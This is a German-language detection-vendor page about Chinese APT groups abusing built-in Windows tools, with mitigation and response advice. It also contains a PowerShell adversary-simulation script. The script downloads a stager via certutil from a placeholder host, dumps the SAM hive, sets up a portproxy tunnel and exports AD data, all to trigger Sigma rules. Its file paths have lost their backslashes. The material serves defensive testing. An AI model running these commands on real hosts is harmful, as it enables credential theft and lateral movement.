SOC Prime Bias: Kritisch

18 May 2026 18:20 UTC
newspaper icon hackers-arise.com

Jagdsaison auf chinesische APTs, die Windows-Tools missbrauchen

Author Photo
SOC Prime Team linkedin icon Folgen
Jagdsaison auf chinesische APTs, die Windows-Tools missbrauchen
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Zusammenfassung

Der Artikel untersucht, wie chinesische Advanced Persistent Threat-Gruppen integrierte Windows-Dienstprogramme missbrauchen, oft als LOLBAS bezeichnet, um Aufklärungen durchzuführen, Anmeldeinformationen zu stehlen und sich seitlich in Umgebungen zu bewegen, während sie sich in routinemäßige Verwaltungsaktivitäten einfügen.

Untersuchung

Er hebt den spezifischen Einsatz von nativen Tools über die Befehlszeile hervor wie nltest, certutil, netsh, reg.exe, vssadmin, und andere und verweist auf Sigma-Regeln, die helfen können, diese Techniken innerhalb von SIEM-Plattformen zu erkennen.

Minderung

Verteidiger werden ermutigt, verdächtige Ausführungen von nativen Windows-Binaries zu überwachen, Zugriffssteuerungen nach dem Prinzip der minimalen Rechte zu erzwingen, Registrierungsänderungen zu überwachen und Erkennungsmuster basierend auf den referenzierten Sigma-Mustern einzusetzen.

Reaktion

Wenn verdächtige LOLBAS-Aktivitäten identifiziert werden, sollten Sicherheitsteams einen Alarm auslösen, den betroffenen Host isolieren, relevante Logs sammeln, überprüfen, ob Anmeldeinformationen extrahiert oder seitliche Bewegungen erfolgt sind, und eine forensische Analyse von allen resultierenden Artefakten durchführen.

Angriffsablauf

Wir aktualisieren diesen Teil noch. Melden Sie sich an, um benachrichtigt zu werden.

Benachrichtigen Sie mich

Simulationsausführung

Voraussetzung: Die Telemetrie- und Baseline-Vorprüfung muss bestanden haben.

Rationale: Dieser Abschnitt beschreibt die genaue Ausführung der gegnerischen Technik (TTP), die darauf abzielt, die Erkennungsregel auszulösen. Die Befehle und die Erzählung MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, die genaue Telemetrie zu erzeugen, die von der Erkennungsmuster erwartet wird.

  • Angriffsbericht & Befehle:

    Ein Angreifer, der sich ersten Zugang zu einer domain-gebundenen Windows-Workstation verschafft hat, versucht, die Domain zu kartieren, privilegierte Gruppen aufzulisten und Anmeldeinformationen zu sammeln, indem er nur native Binaries verwendet, um traditionelle AV-Signaturen nicht auszulösen. Die Schritte sind:

    1. Domänencontroller auflisten: nltest /dclist:domain.local – zeigt alle DCs in der Ziel-Domain.
    2. Systeminformationen sammeln: systeminfo – sammelt OS-Version, Patches und Hardware-Details.
    3. Laufende Prozesse auflisten: tasklist – gibt Einblick in privilegierte Dienste.
    4. Windows-Ereignisprotokolle für Anmeldeereignisse abfragen: Get-EventLog -LogName Security -InstanceId 4624 (PowerShell) – extrahiert erfolgreiche Anmeldeereignisse.
    5. Eine gestaffelte Nutzlast herunterladen: certutil -urlcache -split -f https://example.com/stager.exe C:WindowsTempstager.exe – verwendet certutil, um Webfilter zu umgehen.
    6. Lokale Administratoren auflisten: net localgroup administrators – identifiziert privilegierte Konten.
    7. SAM-Registrierungs-Hive exportieren: reg.exe save hklmsam C:sam.save – versucht, Passwort-Hashes zu dumpen.
    8. Port-Proxy für seitliche Bewegung erstellen: netsh interface portproxy add v4tov4 listenport=4444 connectaddress=10.0.0.5 connectport=3389 – bereitet einen Tunnel vor.
    9. DNS-Einträge auflisten: dnscmd . /enumrecords /zone – entdeckt interne DNS-Zonen.
    10. AD-Objekte über LDIFDE exportieren: ldifde.exe -f C:WindowsTempad_dump.txt -p subtree – zieht Verzeichnisdaten.
    11. Eine Volumen-Schattenkopie erstellen: vssadmin create shadow /for=C: – ermöglicht Dateizugriff auf gesperrte Dateien.

    Jeder Befehl entspricht genau einem der „CommandLine|contains“-Strings in der Sigma-Regel, was sicherstellt, dass die Regel bei den resultierenden Prozesserstellungsereignissen ausgelöst wird.

  • Regressionstest-Skript: (PowerShell – eigenständig, erfordert Administratorrechte)

    # TC-20260518-A7B9K – Simuliert die Nutzung von nativen Windows-Dienstprogrammen durch den Angreifer
# HINWEIS: Auf einem domain-gebundenen Windows-Host mit Administratorrechten ausführen.

# 1. Domänencontroller-Aufzählung
nltest /dclist:domain.local

# 2. Systeminformationen
systeminfo

# 3. Prozesse auflisten
tasklist

# 4. Sicherheitsereignisprotokoll extrahieren (PowerShell)
Get-EventLog -LogName security -InstanceId 4624

# 5. Gestaffelte Nutzlast über certutil herunterladen
certutil -urlcache -split -f https://example.com/stager.exe C:WindowsTempstager.exe

# 6. Lokale Administratoren auflisten
net localgroup administrators

# 7. SAM-Hive exportieren
reg.exe save hklmsam C:sam.save

# 8. Port-Proxy konfigurieren
netsh interface portproxy add v4tov4 listenport=4444 connectaddress=10.0.0.5 connectport=3389

# 9. DNS-Zonen auflisten
dnscmd . /enumrecords /zone

# 10. AD-Daten über LDIFDE exportieren
ldifde.exe -f C:WindowsTempad_dump.txt -p subtree

# 11. Eine Volumen-Schattenkopie erstellen
vssadmin create shadow /for=C:

  • Aufräumbefehle:

    # Dateien entfernen, die während der Simulation erstellt wurden
Remove-Item -Path C:WindowsTempstager.exe -ErrorAction SilentlyContinue
Remove-Item -Path C:sam.save -ErrorAction SilentlyContinue
Remove-Item -Path C:WindowsTempad_dump.txt -ErrorAction SilentlyContinue

# Die portproxy-Regel löschen
netsh interface portproxy delete v4tov4 listenport=4444

# Die Schattenkopie löschen (optional – benötigt Schattenkopie-ID)
# vssadmin delete shadows /for=C: /all /quiet

Treten Sie der Detection as Code-Plattform von SOC Prime bei um die Sichtbarkeit der für Ihr Unternehmen relevantesten Bedrohungen zu verbessern. Um Ihnen den Einstieg zu erleichtern und unmittelbaren Mehrwert zu erzielen, buchen Sie jetzt ein Treffen mit den Experten von SOC Prime.

Kostenlos beitreten